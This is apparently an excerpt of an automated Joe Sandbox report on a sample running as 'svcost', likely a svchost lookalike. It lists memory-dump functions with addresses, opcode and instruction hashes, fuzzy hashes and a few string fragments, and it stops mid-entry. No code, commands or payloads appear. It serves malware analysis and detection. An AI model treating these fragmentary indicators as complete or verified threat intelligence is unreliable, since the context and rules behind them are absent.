                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6ec2d9b502f40f035d1ef51d2a123d454f160bb193fb6e1be681cd3c5fdda093
                                                                                                • Instruction ID: 9d53a63617095efc6b8a6fb5a7dd5103785cc18da81dbd679d51dfab5ecec290
                                                                                                • Opcode Fuzzy Hash: 6ec2d9b502f40f035d1ef51d2a123d454f160bb193fb6e1be681cd3c5fdda093
                                                                                                • Instruction Fuzzy Hash: AAE0127194520C9FDB06FFB09914A9F77A8EF06204F1044F6D50597250DE325A089B96
                                                                                                Function 0541DEB8 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5412b03bae86c78f5ca1657c29e516c473638343c97bd263c4838392bd4e1f05
                                                                                                • Instruction ID: bd534638d35dedc6a17aa82b0862a5995ea73425809918cccafbf569c895b0bb
                                                                                                • Opcode Fuzzy Hash: 5412b03bae86c78f5ca1657c29e516c473638343c97bd263c4838392bd4e1f05
                                                                                                • Instruction Fuzzy Hash: A2E08C34909208DBC704DF94E9549ADBB78EB45315F1081E98C0923340CB32AA02CB89
                                                                                                Function 00C20868 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: 5aafff6cc8fe306f8544b9e7bfcadf8103ecc7dfd62601ce88f5baa0eccb350a
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: 79E0EC34905208EBC708DF94EA5596DBBB9EB45304F2091A9880827382CB329E46DB81
                                                                                                Function 00C22968 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: 0a9956bf53d29395323523e226acb21c0b90dc5334d4ae21b679bc6d77c05c87
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: 16E01234905208EBC704EF95EA55A6DFB79EB45304F2491EDC80817341CB329E46DB82
                                                                                                Function 00C23BE8 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: 60a2e17ed99147f39db7c165fc7f071485cec8c5fe82322ff9103835ea83432a
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: B0E01234909258DBC704DF94E95596DFB78EB45304F2092EDC80927341CF369F46DB85
                                                                                                Function 00C264D3 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b97084689bfdfb03deaaf82c447cd178549b9913ad9a6281c9412956a77e1157
                                                                                                • Instruction ID: e4ed79b9b3f768e81ff8c28f915b78cf40e3a25cfc26d2fed56d60b318c4f1f0
                                                                                                • Opcode Fuzzy Hash: b97084689bfdfb03deaaf82c447cd178549b9913ad9a6281c9412956a77e1157
                                                                                                • Instruction Fuzzy Hash: 03E08C30905258DFCB41EFA8E564AACBFB0EB0A305F2482E9CC5857751D6328E02CB50
                                                                                                Function 00C28CD0 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a63ff089d5f5be6766760804a2575a903cd010e0e7b23c4748c6a7119eff4087
                                                                                                • Instruction ID: b7c8a66ffa430ea4053eb89e337cf69cddf3f40db833c7f324236357e1a4c338
                                                                                                • Opcode Fuzzy Hash: a63ff089d5f5be6766760804a2575a903cd010e0e7b23c4748c6a7119eff4087
                                                                                                • Instruction Fuzzy Hash: 9DE0127194220C9FD701EBB59914A9EB7A8EF06304F1041B5D50497150DE325A049BE2
                                                                                                Function 00C274A0 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: 5b24c4c1138e3f7bde63b4e8387f44de2db89d6bbc16eef7c2b8664cc208ad71
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: A9E0C234D09208DBC704EF94F99496CFB78EB45304F2092E9D80813340CB329E02CF91
                                                                                                Function 00C234A8 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: e41f92dbd3b8699fe5e05230e5b9770ab636cba538488c65e53d5ca36b4a3c10
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: F4E0EC34905208DBCB04EF95E95596DBB78EB85304F2095E9880817341CA329E46DB81
                                                                                                Function 00C27D30 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: 3967d37eaf70a3b391a12eae9fd3814bebead8ec9c2194d88770198f08f70151
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: 11E01234909208DBC704DF95E9A597DFB78EF85304F2092E9C81817341DB729E56DB85
                                                                                                Function 00C20F40 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: 6adae5646d6aceb80b943fa409323d838115e23e2440cbf1aa74018b52855fde
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: 22E01234945208DBCB14DFD4FA55A6DFB78EB45304F2091E9D81C17341CB329E56DB81
                                                                                                Function 00C21F10 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction ID: 5e35f15b84e9f2caf3b285d9539f3d25d3b78cd8fecb8f2af9e6a8f67d9e5693
                                                                                                • Opcode Fuzzy Hash: e01dda82c9c34f99a0311b286c4363a2666359b82d568cf5c4e16d2c75ed9897
                                                                                                • Instruction Fuzzy Hash: BDE0EC34905208DBC704DB94EA5596DBB78EB45304F2491A99C1817741DB329E46DB81
                                                                                                Function 04325D38 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 28c3fcae781cb25eb89da5a6af160a8a0fa0e6a3e2fd5c36d8223c297531e869
                                                                                                • Instruction ID: b0daf6b15d34fc9074a3ea91c702bf3ed4883c23442d4b545faf905667e2bb6c
                                                                                                • Opcode Fuzzy Hash: 28c3fcae781cb25eb89da5a6af160a8a0fa0e6a3e2fd5c36d8223c297531e869
                                                                                                • Instruction Fuzzy Hash: 1DE0EC30905218EFCB40DFB8DA5DA9DBBB8EB05305F1051A99808A3250EB316B44DB41
                                                                                                Function 0432FF68 Relevance: .0, Instructions: 19COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1f9580bb3374aa3bdc0704808ff5aa8774dd7f66c40489649aee1dcd05e39487
                                                                                                • Instruction ID: 6d0eef253fd89f9defceb2091bc3327bdfc30b61f3f929f02e2502a85f4a6dda
                                                                                                • Opcode Fuzzy Hash: 1f9580bb3374aa3bdc0704808ff5aa8774dd7f66c40489649aee1dcd05e39487
                                                                                                • Instruction Fuzzy Hash: 18E0C234905208EBC704DF94EA5496CFB79FB4A304F1091ECC80813340CB32AE12DB81
                                                                                                Function 00C4F4C0 Relevance: .0, Instructions: 18COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c95603483ed510ad3a72d2b2988ee307bf8d672f757fcc54eb1d4af4a2e0df6
                                                                                                • Instruction ID: e45b6d584a936417da8779ecd3850bd56eafcc5583cd7b49ec15d6ce64497f34
                                                                                                • Opcode Fuzzy Hash: 8c95603483ed510ad3a72d2b2988ee307bf8d672f757fcc54eb1d4af4a2e0df6
                                                                                                • Instruction Fuzzy Hash: 00D0A7307053119BA751566478116A6BBD9EE89246304C2BAD60CC7251DF31CC13C790
                                                                                                Function 04326038 Relevance: .0, Instructions: 18COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5832c4e973cd4b37cc9bd0aa9543ceeea616acc539abc0a9b6334540858874ff
                                                                                                • Instruction ID: 9e066bc3ff3a679fa76d1677773a3e7acb628fc690765132f702987bfe3c1c82
                                                                                                • Opcode Fuzzy Hash: 5832c4e973cd4b37cc9bd0aa9543ceeea616acc539abc0a9b6334540858874ff
                                                                                                • Instruction Fuzzy Hash: 2AD05B7090A21CDBC704DFA4EA6996DBB7CFF46301F1091A8D40823250D7311945EB95
                                                                                                Function 04329340 Relevance: .0, Instructions: 18COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fe11aca23239869fe3cbc6a089d103c26f17fde3dee204801538722b7ce69293
                                                                                                • Instruction ID: db1bb70f5714eb620188a7e73b883a954dbb4bacd57d01b472e051cdfa4dada1
                                                                                                • Opcode Fuzzy Hash: fe11aca23239869fe3cbc6a089d103c26f17fde3dee204801538722b7ce69293
                                                                                                • Instruction Fuzzy Hash: 2FE01270A1830CEBD700EFB5D9557ADB7F5EB85310F5049A9E5089F245D9316F049B81
                                                                                                Function 043292F8 Relevance: .0, Instructions: 17COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 979ec8f331eb7735336832e0f00cbe0fb1f833bcf32db6d06592a21c5f1bb27c
                                                                                                • Instruction ID: 878c8bd23089950c48f8e8b2c6a6fed118c90c28a1828d736668f6ed0632d445
                                                                                                • Opcode Fuzzy Hash: 979ec8f331eb7735336832e0f00cbe0fb1f833bcf32db6d06592a21c5f1bb27c
                                                                                                • Instruction Fuzzy Hash: C3E01271A1420CEFC740EFE5D50179DB7F5DB45310F5085A9D808D7341DA316F059B91
                                                                                                Function 0031082F Relevance: .0, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f271fa5355c589f32cafc5a5f1d9fa2487fe1682dfdd4a4448f72f129516a264
                                                                                                • Instruction ID: 3c29a49327b45a8a5db072a75ba05aee0adb72de8caaad2d75fcd614a9618085
                                                                                                • Opcode Fuzzy Hash: f271fa5355c589f32cafc5a5f1d9fa2487fe1682dfdd4a4448f72f129516a264
                                                                                                • Instruction Fuzzy Hash: EED0E25540E7D01FCB039770283D9443F309D4320834E09CBD088DF0A3D459654E8B12
                                                                                                Function 00C4F530 Relevance: .0, Instructions: 15COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e59fdc9660f5b179636a36920ec112e93056ccbfa3a76274f5637b8a4fdaf747
                                                                                                • Instruction ID: 38f65d654991bb4582e122596943403aab0c3697dc008d79eee19390ff16af65
                                                                                                • Opcode Fuzzy Hash: e59fdc9660f5b179636a36920ec112e93056ccbfa3a76274f5637b8a4fdaf747
                                                                                                • Instruction Fuzzy Hash: 94C04C6049A3842FC75389642C561C43FF8CD42815305C3E75449D70528826096B8731
                                                                                                Function 04320E8B Relevance: .0, Instructions: 13COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 920548afceac6da984d372b21dda65e698fbd6f58e109c9e27f181b6b4a97cc6
                                                                                                • Instruction ID: d688c866de74c02c2ffcac09df1504fdac98a4492085b06be4e8b8aecdb285e5
                                                                                                • Opcode Fuzzy Hash: 920548afceac6da984d372b21dda65e698fbd6f58e109c9e27f181b6b4a97cc6
                                                                                                • Instruction Fuzzy Hash: 7AD017B4A002288BCB04AFA0D8846AD77B9AB45301F200558C00DA7728DBB4A9498F40
                                                                                                Function 0541E320 Relevance: .0, Instructions: 12COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dc601db9eb6c04daa7dbd2a55cf0303e932d82ebe9c858b58ec6e59dc9c2c5b7
                                                                                                • Instruction ID: ab9c6954ebeb1f879908901d6a20f4d462d5dd247c61f6eed1a05721fe2e2985
                                                                                                • Opcode Fuzzy Hash: dc601db9eb6c04daa7dbd2a55cf0303e932d82ebe9c858b58ec6e59dc9c2c5b7
                                                                                                • Instruction Fuzzy Hash: E9C08C3804B30887D2001341AA3CFBBB69C9306345F002955CC0D000220B314020CA8A
                                                                                                Function 0031C878 Relevance: .0, Instructions: 11COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: abbfb8bcd5a8778f929539343d12f9e45922a45df5e3dbba21a280a05d55cce9
                                                                                                • Instruction ID: 494731d125ac8edf9321e48a4c43596532118b7ed1b35ed8931152e2519add6a
                                                                                                • Opcode Fuzzy Hash: abbfb8bcd5a8778f929539343d12f9e45922a45df5e3dbba21a280a05d55cce9
                                                                                                • Instruction Fuzzy Hash: 62C08C304023088FD20A37F4BD1DB3A765CBB0730AF000064E00C404308F325844CB27
                                                                                                Function 0432ABB1 Relevance: .0, Instructions: 11COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5a5c907fe5d3494d18f2dd4e203117f1d31ed28a947ddec876c01110a1308063
                                                                                                • Instruction ID: ae6a3f4c78d2757a16de34e6fcaaa39e9beeb2b870421efe3f189f61cb5c8a78
                                                                                                • Opcode Fuzzy Hash: 5a5c907fe5d3494d18f2dd4e203117f1d31ed28a947ddec876c01110a1308063
                                                                                                • Instruction Fuzzy Hash: A7C04C1018E3C15FDB4797302C2F684BF20AB43A00B49C7DBD4848B4E7DA95049AC363
                                                                                                Function 04320D05 Relevance: .0, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: df3ac7b71cb13a32a96308a7b719939496bb0a49117451bb7e44e5899c99f26f
                                                                                                • Instruction ID: 1e3fddcd7a72aabc5b08573c983a3be89f59427d042458cd5dd177fa8f2d651e
                                                                                                • Opcode Fuzzy Hash: df3ac7b71cb13a32a96308a7b719939496bb0a49117451bb7e44e5899c99f26f
                                                                                                • Instruction Fuzzy Hash: 05D092B4A146298BDB21DF90CD44BA9B7BDAB44302F0051A8A42D6B654D7B03B4A8F40
                                                                                                Function 00C4D432 Relevance: .0, Instructions: 9COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 41b12b9c4834e44f7e8cecf3f7c4db2b49018dc5443e55273db051a952cb6e05
                                                                                                • Instruction ID: a13515b9b5a43fbd606254e126dcbac7d0bb12f018c62a20a308b9676c9494f2
                                                                                                • Opcode Fuzzy Hash: 41b12b9c4834e44f7e8cecf3f7c4db2b49018dc5443e55273db051a952cb6e05
                                                                                                • Instruction Fuzzy Hash: 52C00276E501199A8F00DAD9E4518DCB774EB94321B004026E614A6104D6302526CB54

                                                                                                Non-executed Functions

                                                                                                Function 00C47A04 Relevance: 6.3, Strings: 5, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: S$X$`Xh$c$c:
                                                                                                • API String ID: 0-947778159
                                                                                                • Opcode ID: bf2510abc048c2418a5b3257cf536c01095ee2f4d0a952e0d51ffe6bff06019a
                                                                                                • Instruction ID: 09b4091cb3b1cdbd541394e74cd8e3292186cc7a33bb8c9a0a4c12b21f2482e3
                                                                                                • Opcode Fuzzy Hash: bf2510abc048c2418a5b3257cf536c01095ee2f4d0a952e0d51ffe6bff06019a
                                                                                                • Instruction Fuzzy Hash: 56212F74A042198FDB619F55C888BADBBB5BB1A314F2441E9D419A7290CBB04EC5CF16
                                                                                                Function 00C2AC6B Relevance: 5.1, Strings: 4, Instructions: 61COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +$,$D$`Xh
                                                                                                • API String ID: 0-4098769730
                                                                                                • Opcode ID: 2096f01cb601712bf3c8c264e7d012d5ce99965f3e394beeaf26f4fb985c0e5b
                                                                                                • Instruction ID: 20ee62f188a7f0e5f4325fd05520c555205329ab95ab03139ff9881efcce80b6
                                                                                                • Opcode Fuzzy Hash: 2096f01cb601712bf3c8c264e7d012d5ce99965f3e394beeaf26f4fb985c0e5b
                                                                                                • Instruction Fuzzy Hash: 5F21DE74A11269CFDB24DF58E988BDCB7F2EB48320F1080EAD509A7640DB31AE81CF40
                                                                                                Function 00C2A714 Relevance: 5.1, Strings: 4, Instructions: 59COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +$,$D$`Xh
                                                                                                • API String ID: 0-4098769730
                                                                                                • Opcode ID: d4c854475035a7bf6be5533b7cd4784588506dfee5c59c29ac578a32e08d00b7
                                                                                                • Instruction ID: 37b4c9394acaa183dddbeb1a474d46b223e70c26e82047bee412d53e18bf2cf7
                                                                                                • Opcode Fuzzy Hash: d4c854475035a7bf6be5533b7cd4784588506dfee5c59c29ac578a32e08d00b7
                                                                                                • Instruction Fuzzy Hash: 1A21FF749012A8CFDB20DF58E988BDDB7F2AB48324F0080EAD409A7640C731AE85CF41
                                                                                                Function 00C2B56A Relevance: 5.1, Strings: 4, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: )$+$2$`Xh
                                                                                                • API String ID: 0-1770864677
                                                                                                • Opcode ID: cb569a1256b711a5e951a3ca376b20b5fdab9ceb6caa5b720649902d29cd3a06
                                                                                                • Instruction ID: 888a4679f8859a753b292dc8310c4db147beadc1959d37ebd5b91d375684bdc7
                                                                                                • Opcode Fuzzy Hash: cb569a1256b711a5e951a3ca376b20b5fdab9ceb6caa5b720649902d29cd3a06
                                                                                                • Instruction Fuzzy Hash: 5B21DB74A012A8CFDB24DF68D988BDDB7B1FB49320F1081AAD40AAB690C7345E91CF01
                                                                                                Function 00C47D84 Relevance: 5.0, Strings: 4, Instructions: 42COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
